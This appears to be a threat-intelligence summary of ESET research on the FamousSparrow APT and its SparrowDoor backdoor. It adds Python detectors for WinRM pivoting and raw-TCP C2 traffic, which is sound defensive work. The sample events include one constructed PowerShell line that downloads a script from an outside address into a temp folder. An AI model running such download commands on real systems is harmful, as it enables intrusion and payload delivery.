Full Report
ESET researchers uncover the toolset used by the FamousSparrow APT group, including two undocumented versions of the group’s signature backdoor, SparrowDoor
Analysis Summary
# Threat Actor: FamousSparrow
## Attribution & Identity
China-aligned APT group, active since at least 2019. Microsoft Threat Intelligence links the group to the actor it tracks as Salt Typhoon; ESET, the reporting organization, is still assessing the nature and extent of that link, noting that some TTPs overlap with Earth Estries. FamousSparrow is the only known user of the SparrowDoor backdoor.
## Activity Summary
The group was thought to have gone quiet after 2022, but ESET found fresh activity: in July 2024 it compromised a trade group in the US financial sector, a few days after breaching a research institute in Mexico. It also targeted a governmental institution in Honduras between 2022 and 2024. The recent intrusions revealed an expanded toolset, including two previously undocumented versions of the group's flagship backdoor, SparrowDoor.
## Tactics, Techniques & Procedures
- **Initial Access/Execution:** The group was previously documented exploiting the ProxyLogon vulnerability in Microsoft Exchange (CVE-2021-26855, 2021).
- **Persistence/Defense Evasion:** Deploys newly developed, upgraded versions of the SparrowDoor backdoor.
  - The new SparrowDoor versions show improved code quality and architecture, including parallel execution of commands.
  - The loaders share code with earlier FamousSparrow samples and use the same reflective-loader shellcode as the `libhost.dll` sample described by the NCSC in February 2022.
  - The configuration format resembles that of older versions, but the encryption key is now hardcoded in both the loader and the backdoor.
  - In the modular SparrowDoor version, XOR encryption has been replaced with RC4.
- **Lateral Movement:** Used remote PowerShell sessions (WinRM) to pivot to other machines. [T1021.006]
- **Collection:** SparrowDoor can read files from local drives, mapped removable media, and mapped network shares. [T1005], [T1025], [T1039]
- **Command and Control (C2):**
  - C&C communications use a format similar to that of previous SparrowDoor versions.
  - Communicates over raw TCP sockets rather than an application-layer protocol. [T1095]
  - Downloads additional files over HTTP. [T1071.001]
  - The modular SparrowDoor version encrypts network data with RC4. [T1573.001]
  - Configured with up to three fallback C&C servers. [T1008]
  - Downloaded PowerHub over HTTP on port 8080 and HTTPS on port 8443. [T1571]
- **Exfiltration:**
  - Exfiltrates data over the same raw TCP socket used for C2. [T1041]
  - Splits file content into 4 kB chunks before sending. [T1030]
  - Returns the content of any requested file automatically. [T1020]
- **Tool Usage:** Deployed the privately sold ShadowPad backdoor, the first time ESET has seen this group use it.
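The Lateral Movement item above (remote PowerShell sessions used to pivot) is detectable on the target host rather than on the wire. The following detection is an added example written for this summary, not code from ESET or from the report; the events it runs over are constructed, and the 60-second correlation window and the approved-source allowlist are assumptions.

```python
"""Correlate the traces a remote PowerShell (WinRM) session leaves on the target
host, to surface pivots like the one described above.  A session shows up as:
  Security 4624, LogonType 3       network logon from the pivoting host
  WinRM/Operational 91             WSMan shell created for the remote session
  Security 4688, wsmprovhost.exe   the process that hosts the remote runspace
  PowerShell/Operational 4104      script blocks run in it (if script block
                                   logging is enabled)
Events below are constructed, not from the ESET report; field names follow the
Windows event data names."""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)   # assumed: logon, shell and host process land within seconds
WINRM_LOG = "Microsoft-Windows-WinRM/Operational"
PS_LOG = "Microsoft-Windows-PowerShell/Operational"
PS_SHELL_URI = "http://schemas.microsoft.com/powershell/Microsoft.PowerShell"

SAMPLE_EVENTS = [
    # Approved jump host 10.0.0.10 opening a session on SRV-FS01
    dict(ts="2024-07-03T08:00:00", host="SRV-FS01", log="Security", id=4624, LogonType=3, IpAddress="10.0.0.10", TargetUserName="ops-admin"),
    dict(ts="2024-07-03T08:00:01", host="SRV-FS01", log=WINRM_LOG, id=91, ResourceUri=PS_SHELL_URI),
    dict(ts="2024-07-03T08:00:01", host="SRV-FS01", log="Security", id=4688, NewProcessName=r"C:\Windows\System32\wsmprovhost.exe"),
    # Compromised server 10.0.10.5 pivoting onto SRV-FS01 and fetching a script over tcp/8080
    dict(ts="2024-07-03T10:15:00", host="SRV-FS01", log="Security", id=4624, LogonType=3, IpAddress="10.0.10.5", TargetUserName="svc-backup"),
    dict(ts="2024-07-03T10:15:02", host="SRV-FS01", log=WINRM_LOG, id=91, ResourceUri=PS_SHELL_URI),
    dict(ts="2024-07-03T10:15:02", host="SRV-FS01", log="Security", id=4688, NewProcessName=r"C:\Windows\System32\wsmprovhost.exe"),
    dict(ts="2024-07-03T10:15:09", host="SRV-FS01", log=PS_LOG, id=4104, ScriptBlockText=r"Invoke-WebRequest -Uri http://198.51.100.7:8080/p -OutFile C:\Windows\Temp\p.ps1"),
    # Plain network logon (e.g. SMB) on another host: no WinRM shell, must not alert
    dict(ts="2024-07-03T10:20:00", host="SRV-DB02", log="Security", id=4624, LogonType=3, IpAddress="10.0.10.5", TargetUserName="svc-backup"),
]


def _ts(e):
    return datetime.fromisoformat(e["ts"])


def find_remote_powershell_sessions(events, approved_sources):
    """Return one alert per WinRM session whose source is not an approved
    management host.  approved_sources is a set of source IP strings."""
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
    alerts = []
    for host, evs in by_host.items():
        evs.sort(key=_ts)
        for logon in evs:
            if not (logon["log"] == "Security" and logon["id"] == 4624 and logon.get("LogonType") == 3):
                continue
            src = logon.get("IpAddress")
            if src in approved_sources:
                continue
            t0 = _ts(logon)
            window = [e for e in evs if t0 <= _ts(e) <= t0 + WINDOW]
            shell = any(e["log"] == WINRM_LOG and e["id"] == 91 for e in window)
            host_proc = any(e["log"] == "Security" and e["id"] == 4688
                            and e.get("NewProcessName", "").lower().endswith("\\wsmprovhost.exe")
                            for e in window)
            if shell and host_proc:
                alerts.append({
                    "target": host, "source_ip": src,
                    "user": logon.get("TargetUserName"), "start": logon["ts"],
                    "script_blocks": [e["ScriptBlockText"] for e in window
                                      if e["log"] == PS_LOG and e["id"] == 4104],
                })
    return alerts


if __name__ == "__main__":
    for a in find_remote_powershell_sessions(SAMPLE_EVENTS, approved_sources={"10.0.0.10"}):
        print(f"{a['source_ip']} -> {a['target']} as {a['user']} at {a['start']}: {a['script_blocks']}")
```

The three traces are required together on purpose: a 4624 network logon alone is every SMB or RPC connection, and event 91 alone fires for legitimate administration. Process-creation auditing (4688) and script block logging (4104) are off by default and have to be enabled by policy for this to work.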
## Targeting
- **Sectors:** Financial sector, research institutes, governmental institutions.
- **Geography:** United States, Mexico, Honduras.
- **Victims:** A trade group operating in the US financial sector; a research institute in Mexico; a governmental institution in Honduras. Previously targeted hotels, international organizations, engineering companies, and law firms.
## Tools & Infrastructure
- **Malware families used:**
- SparrowDoor (two undocumented, upgraded versions discovered, one modular).
- ShadowPad (observed for the first time being used by this actor).
- PowerHub (downloaded during the campaign).
- **Infrastructure (C2, domains, IPs):** C2 uses raw TCP sockets in a format similar to earlier versions. No specific C2 domains or IP addresses are given in this summary; the only network detail is the ports used for the PowerHub download (8080/tcp for HTTP, 8443/tcp for HTTPS).
## Implications
FamousSparrow is actively developing its capabilities: the architectural upgrades in the new SparrowDoor versions overturn the assumption that the group had gone dormant after 2022. Its first observed use of ShadowPad, a backdoor sold privately rather than publicly available, suggests access to high-end espionage tooling shared among China-aligned operators, which may point to increased resourcing. The targeting profile remains focused on sensitive economic and governmental entities in the Americas.
## Mitigations
- Hunt for SparrowDoor loader and backdoor artefacts on endpoints. The stable indicators are the loader's code overlaps with earlier samples and the reflective-loader shellcode shared with the `libhost.dll` sample; the RC4 encryption and configuration format help when triaging a captured sample but are not signature-able on the wire.
- Review outbound traffic for long-lived raw TCP sessions with no recognised application-layer protocol, for hosts that fail against several external servers on one port before one answers (fallback behaviour), and for HTTP/HTTPS on non-standard ports (e.g., 8080, 8443). Baseline which systems legitimately use those ports first, since 8080 and 8443 are common alternate web ports.
- Segment the network and restrict lateral movement: allow WinRM (5985/5986) only from designated management hosts, and log remote PowerShell sessions on targets (WinRM Operational event 91, wsmprovhost.exe process creation, script block logging), since the actor pivots with remote PowerShell sessions.
- Patch internet-facing Exchange servers and similar edge systems promptly; ProxyLogon was the group's documented initial-access vector.
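The network checks in the mitigations above, and the C2 behaviour they target (raw TCP sockets, up to three fallback servers, web downloads on 8080/8443), can be applied to connection logs. The script below is an added example written for this summary, not code from ESET or the report: it runs over constructed Zeek conn.log-style records, and the internal address ranges, the 300-second "long session" threshold, the 10-minute fallback window and the two-dead-servers minimum are assumed tuning values.

```python
"""Triage Zeek conn.log-style records for the SparrowDoor network patterns
listed above: a long raw TCP session with no recognised application protocol
(T1095), a host walking through dead servers before one answers (T1008), and
web downloads on 8080/8443 (T1571).  Records and thresholds are constructed
for illustration, not taken from the ESET report."""
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
WEB_ALT_PORTS = {8080, 8443}
FAILED_STATES = {"S0", "REJ", "RSTO", "RSTOS0"}  # Zeek: no reply, refused, or reset before data
LONG_SESSION_SECS = 300.0     # assumed threshold: a raw-socket C2 channel outlives any web fetch
FALLBACK_WINDOW = timedelta(minutes=10)
MIN_DEAD_SERVERS = 2          # assumed: distinct dead servers tried before one answers

# Constructed sample (TEST-NET addresses); timestamps are ISO strings as in an exported log.
SAMPLE_CONNS = [
    # 10.0.20.8 walks a server list on tcp/443: two dead hosts, then a long unnamed-protocol session
    dict(ts="2024-07-03T09:00:00", src="10.0.20.8", dst="203.0.113.10", dport=443, proto="tcp", service="-", duration=3.0, orig_bytes=0, resp_bytes=0, conn_state="S0"),
    dict(ts="2024-07-03T09:00:05", src="10.0.20.8", dst="203.0.113.11", dport=443, proto="tcp", service="-", duration=0.1, orig_bytes=0, resp_bytes=0, conn_state="REJ"),
    dict(ts="2024-07-03T09:00:10", src="10.0.20.8", dst="198.51.100.7", dport=443, proto="tcp", service="-", duration=5400.0, orig_bytes=48_000, resp_bytes=2_100, conn_state="SF"),
    # ordinary TLS to a web site: short, protocol recognised
    dict(ts="2024-07-03T09:01:00", src="10.0.20.8", dst="203.0.113.50", dport=443, proto="tcp", service="ssl", duration=1.2, orig_bytes=900, resp_bytes=40_000, conn_state="SF"),
    # plain HTTP download from the live server on tcp/8080
    dict(ts="2024-07-03T09:02:30", src="10.0.20.8", dst="198.51.100.7", dport=8080, proto="tcp", service="http", duration=4.0, orig_bytes=600, resp_bytes=310_000, conn_state="SF"),
    # internal SMB: not outbound, never considered
    dict(ts="2024-07-03T09:03:00", src="10.0.10.5", dst="10.0.10.6", dport=445, proto="tcp", service="smb", duration=20.0, orig_bytes=5_000, resp_bytes=7_000, conn_state="SF"),
]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def _load(conns):
    """Parse timestamps once; every other field is used as-is."""
    return [dict(c, ts=datetime.fromisoformat(c["ts"])) for c in conns]


def _outbound(c):
    return c["proto"] == "tcp" and is_internal(c["src"]) and not is_internal(c["dst"])


def raw_tcp_sessions(conns):
    """Outbound, established, long-lived, and Zeek could not name the protocol."""
    return [c for c in conns if _outbound(c) and c["service"] == "-"
            and c["conn_state"] not in FAILED_STATES
            and c["duration"] >= LONG_SESSION_SECS
            and c["orig_bytes"] + c["resp_bytes"] > 0]


def fallback_rotation(conns):
    """One source, one port: several distinct external servers fail to answer,
    then another accepts the connection.  That is the shape of a backdoor
    working down its primary-plus-fallback server list."""
    by_key = defaultdict(list)
    for c in conns:
        if _outbound(c):
            by_key[(c["src"], c["dport"])].append(c)
    hits = []
    for (src, dport), cs in by_key.items():
        cs.sort(key=lambda c: c["ts"])
        dead = {}                                   # dst -> time of its last failed attempt
        for c in cs:
            if c["conn_state"] in FAILED_STATES:
                dead[c["dst"]] = c["ts"]
                continue
            recent = sorted(d for d, t in dead.items()
                            if d != c["dst"] and c["ts"] - t <= FALLBACK_WINDOW)
            if len(recent) >= MIN_DEAD_SERVERS:
                hits.append({"src": src, "dport": dport, "dead_servers": recent,
                             "live_server": c["dst"], "ts": c["ts"].isoformat()})
            dead.clear()                            # a live session ends the walk
    return hits


def nonstandard_web(conns):
    """HTTP/TLS that Zeek did recognise, but on an alternate web port."""
    return [c for c in conns if _outbound(c) and c["dport"] in WEB_ALT_PORTS
            and c["service"] in {"http", "ssl"}]


def triage(records):
    conns = _load(records)
    return {"raw_tcp_c2": raw_tcp_sessions(conns),
            "fallback_rotation": fallback_rotation(conns),
            "nonstandard_web": nonstandard_web(conns)}


if __name__ == "__main__":
    for rule, findings in triage(SAMPLE_CONNS).items():
        print(rule, [f.get("live_server") or f.get("dst") for f in findings])
```

The three rules are deliberately independent: the raw-socket check works even when the backdoor's first server answers, the fallback check fires even for short sessions, and the alternate-port check catches the download stage. On a real network each needs a per-host baseline, otherwise proxies, monitoring agents and long database sessions on unnamed ports will dominate the results.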